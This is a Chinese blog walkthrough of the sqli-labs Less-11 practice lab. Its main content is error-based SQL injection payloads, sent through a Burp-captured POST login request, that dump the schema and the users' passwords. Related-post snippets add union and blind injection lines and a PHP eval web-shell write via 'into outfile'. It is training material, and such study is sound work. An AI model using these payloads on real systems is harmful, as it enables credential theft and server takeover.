SQLI DUMB SERIES-11

最新推荐文章于 2019-09-24 11:37:45 发布
最新推荐文章于 2019-09-24 11:37:45 发布
阅读量273 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/momoli/p/10682524.html
版权

(1)检测构造方式

 

由此看出输入的用户名以及密码都被一对单引号所包含。

方法一:

(2) 模拟真实环境,以用户的身份登录。

(3)用burp抓包。开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater.

(4)打开burp的repeater页面,修改post参数,测试是否存在报错注入。

说明存在报错型注入。

(5)可用extractvalue(目标xml文档,搜索路径)进行攻击。

爆库名(库名前用‘~’进行区别)

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

 

爆user表的列名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

其他用户值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

 

(6)测试最后得到的值是否正确

方法二:

  从(1)中看出可用闭合单引号,若通过其他途径知道了数据库里的一些用户名,即可获得密码。

转载于:https://www.cnblogs.com/momoli/p/10682524.html

weixin_34324081
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLI DUMB SERIES-1
weixin_33738578的博客
03-01 2985
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果:   现在可知,“ ' ”并没有被过滤,因此...
SQLI DUMB SERIES-1-2
qq_43613144的博客
07-20 2349
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法 第一题 1.提示输入ID,提示也有get,所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤,然后可以进行 回显成功 回显失败、 所以说此处存在注入点 2.用order by判断列数 第三栏位存在,第四栏位不存在,所以说这个表只有三列 3.爆库 联合查询注...
SQLI DUMB SERIES-11 及 Burp Suite Professional的简易使用方法
imomoe的博客
09-24 425
11关为POST提交 则我们可以借助工具:BurpLoader 将浏览器设置代理为127.0.0.1 在Burploader中设置代理 在其中添加 127.0.0.1:8080 并在前方的Running复选框打上勾 在工具中打开拦截 此时我们在浏览器中的任何数据都会被拦截 在数据报中右键选择Send to Repeater 我们再进入Repeater选项卡然后...
SQLI DUMB SERIES-16
weixin_33754913的博客
04-14 128
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功。若通过其他方法获取数据库的用户名,可通过这个方法登录成功。 (2)获取其他信息可用考虑时间延迟注入。方法同15。 转载于:https://www.cnblogs.com/momoli/p/10705374.html...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
SQLI DUMB SERIES-13
weixin_33953384的博客
04-14 212
(1)检测闭合方式 通过 ') 闭合。 (2)尝试输入 admin')# 无回显。尝试报错注入, 爆表payload: admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名 爆users表的列 其他均与12关相同。 转载于:https://www.cnblogs.c...
SQLi-DB Reborn
08-27
SQLi-DB Reborn.
SQLI DUMB SERIES-10
imomoe的博客
09-24 411
第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ //猜表名 ?id=1' and if ((ascii(substr((select column_name from information_schema....
SQLI DUMB SERIES-6
weixin_34273479的博客
03-12 238
less6 输入 ?id=1" 说明双引号未被过滤,输入的id被一对双引号所包围,存在注入点,可以闭合双引号。 而输入正常时 情况和less5相同,因此注入同less5。 转载于:https://www.cnblogs.com/momoli/p/10515723.html...
SQLI DUMB SERIES-4
weixin_33725807的博客
03-02 167
less4 输入单引号发现回显正常,说明单引号被过滤了,输入双引号: ?id=1" 说明输入的Id被一对双引号和圆括号包围,因此闭合双引号和圆括号就行,其他方法跟less1差不多 例如:union查询表名 ?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%2...
SQLI DUMB SERIES-8
weixin_33749242的博客
04-09 332
(1)在id后加单引号。无回显,加双引号跟正常输入是一样的回显,既然不会回显出错信息,只能进行盲注。 (2)盲注的方法同less5 转载于:https://www.cnblogs.com/momoli/p/10678482.html...
SQLI DUMB SERIES-12
weixin_33946020的博客
04-14 201
(1)检测闭合方式:在username上输入" admin" " 说明输入的username后还有双引号和括号 方法一: (2)通过其他途径知道用户名即可。如 输入" admin")# " 方法二: (3)构造即可闭合又可报错的语句,在username处输入 爆库payload: admin" and extractvalue(1,concat(0x7e,(select...
SQLI DUMB SERIES-5
weixin_34179762的博客
03-12 612
less5 (1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式 (3)双注入查询 参考资料:http://www.2cto.com/article/201303/192718.html 简单的说,使用聚合函数进行双注入查询时...
SQLI DUMB SERIES-7
imomoe的博客
09-23 511
由于没有回显且作者希望我们使用outfile所以我们使用mysql中的 select into outfile语句将结果输出到指定的文件中 ?id=1'))--+ 构造闭合 ?id=1')) union all select 1,2,'<?php @eval($_POST["xxx"]);?>' into outfile '/var/www/sql/123.txt' --+ ...
sqli dumb series-1
最新发布
03-16
sqli dumb series-1是一个SQL注入漏洞测试平台,用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例,用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并修复SQL注入漏洞,提高网站的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值